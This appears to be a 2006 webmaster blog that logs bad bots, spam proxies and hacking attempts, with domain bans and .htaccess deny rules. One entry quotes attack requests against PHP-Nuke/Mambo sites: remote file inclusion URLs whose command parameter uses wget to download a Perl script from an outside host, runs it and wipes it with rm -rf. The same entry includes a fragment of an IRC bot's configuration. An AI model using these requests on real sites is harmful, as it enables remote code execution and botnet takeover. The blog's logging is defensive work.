This domain redirects to peepsurf.com which is a proxy. Since the url being atempted was one that spammers hit I suspect they were trying to get by my blocks. I don't know why the spam never gets posted even when they get past the block. Lammers....

I tested this proxy by taking it to the bot trap and got this.

210.193.49.199 199.210-193-49.idc-colo.qala.com.sg It passed my useragent.

I can not tell where they got the nodomaintransfer21.com from it did not come from that proxy must be running more than one both need to be banned.

See post on guestbook spammer running on nodomaintransfer22.com

Domain Ban.
idc-colo.qala.com.sg,Singapore peepsurf.com proxy
nodomaintransfer21.com,Singapore peepsurf.com proxy

Union Injection hackers

Ever since I posted on my new anti union injection module hackers have been trying to hack my forums. Someone tell me something. Perhaps I don't usderstand this but why would a hacker show me just how he hacks a site so I can take that info and adjust my script to block such hacks?

All his atempts were blocked even by my alpha script.

modules.php?basepath=http://paupal.info/folder/cmd1.gif?&cmd=cd%20/tmp/;wget%20http://paupal.info/folder/phpnuke.txt;perl%20phpnuke.txt;rm%20-rf%20phpnuke.*? GET HTTP/1.0
Agent: mozilla/5.0
212.55.218.196 hypernet.ch

modules.php?basepath=http://paupal.info/folder/cmd.txt?&cmd=cd%20/tmp/;wget%20http://paupal.info/folder/mambo1.txt;perl%20mambo1.txt;rm%20-rf%20mambo1.*? GET HTTP/1.0
Agent: mozilla/5.0
212.55.218.196 hypernet.ch

modules.php?basepath=http://expl0itz.com/cmd.txt?&cmd=cd%20/tmp/;wget%20http://paupal.info/folder/mambo2.txt;perl%20mambo2.txt;rm%20-rf%20mambo2.*? GET HTTP/1.0
Agent: mozilla/5.0
212.55.218.196 hypernet.ch

modules.php?basepath=http://paupal.info/folder/cmd.txt?&cmd=cd%20/tmp/;wget%20http://paupal.info/folder/mambo2.txt;perl%20mambo2.txt;rm%20-rf%20mambo2.*? GET HTTP/1.0
Agent: mozilla/5.0
212.55.218.196 hypernet.ch


hypernet.ch is banned

Here is part of his IRC script code.
my $linas_max='4';
my $sleep='5';
my @adms=("xxxxx","ok","mos","KKTeam");
my @canais=("#phpnuke");
my $nick='shutup';
my $ircname ='Stop';
chop (my $realname = 'uname -rs');
$servidor='mushu.tetovalive.de' unless $servidor;
my $porta='8200';

sitescripts.com link checker

sitescripts.com link checker
66.113.130.183 lsh158.siteprotect.com

This bot looks like its using a link checker downloaded from sitescripts.com

I think this is a scrapper whatever it is its pretending to be sitescripts.com

siteprotect.com has no website so its suspent right out of the box.

Its banned by agent and domain.

coli.uni-saarland.de / answerbus bot

This bot first came in using a agant for a text browser. Clearly fake.

lynx/2.8.5dev.16 libwww-fm/2.14 ssl-mm/1.4.1 openssl/0.9.7a
134.96.104.226 cluster-7.coli.uni-saarland.de

After a week they changed user agents to.

answerbus (http://www.answerbus.com/)
134.96.1.195 answerbus.coli.uni-saarland.de

Now they are back to using a fake text browser agent. Perhaps its 2 bots.
lynx/2.8.5dev.16 libwww-fm/2.14 ssl-mm/1.4.1 openssl/0.9.7a
134.96.104.221 cluster-2.coli.uni-saarland.de

lynx/2.8.5dev.16 libwww-fm/2.14 ssl-mm/1.4.1 openssl/0.9.7a
134.96.104.220 cluster-1.coli.uni-saarland.de



It often came in with refers that tracked back to its scraper site.
134.96.1.195 answerbus.com answerbus.de uni-saarland.de

All of these websites have the same thing on them. it looks like a search system and even says "supported by research grants from ....." I dont know if thats true if it is they should ask for the money back. Unless they support scrappers?

I tested this search system using my keywords for my sites and what I found were listings with my text and site name that looked like they were links to my site but when clicking on them I was taken to other scrapper linking sites.

This thing is banned by domain and user agent.


Update bot getting very active suggest adding to server ip ban

deny from 134.96.104.226
deny from 134.96.104.221
deny from 134.96.104.220
deny from 134.96.1.195

blogsearchbot-pumpkin-2

blogsearchbot-pumpkin-2 GET HTTP/1.0
85.10.211.195 85-10-211-195.clients.your-server.de

I don't know what pumpkin is but its banned.

They say it doesn't read robots I dont care with no ideal what it is its banned.

Sep 5, 2006

upc-a.chello.nl abuse

wells search ii
62.163.12.132 a12132.upc-a.chello.nl
wells search ii
62.163.32.222 a32222.upc-a.chello.nl
wells search ii
62.194.120.227 h120227.upc-h.chello.nl



Have been seeing a lot of this Spam Harvestor running on chello.nl

Also turned up at chello084112114199.33.11.vie.surfer.at

This is a known spam harvestor.

SuperCleaner 2.84

What is useragent
Mozilla/4.0 (compatible; SuperCleaner 2.84; Windows NT 5.1)

SuperCleaner 2.84 is a disk cleaner so why is it trying to visit my site?
24.147.48.201 c-24-147-48-201.hsd1.ma.comcast.net


Bad behaivor is blocking it due to incorrect format.

Unless I can find out what SuperCleaner 2.84 is it will be added to the block list.

Welcome

Welcome to the new Blog. I had to move from the forum over to here because of all the atempts to hack the forum software.

All the old post from the forum had to be purged so I could get them out of the gogle index.

I will atempt to repost the major ones here.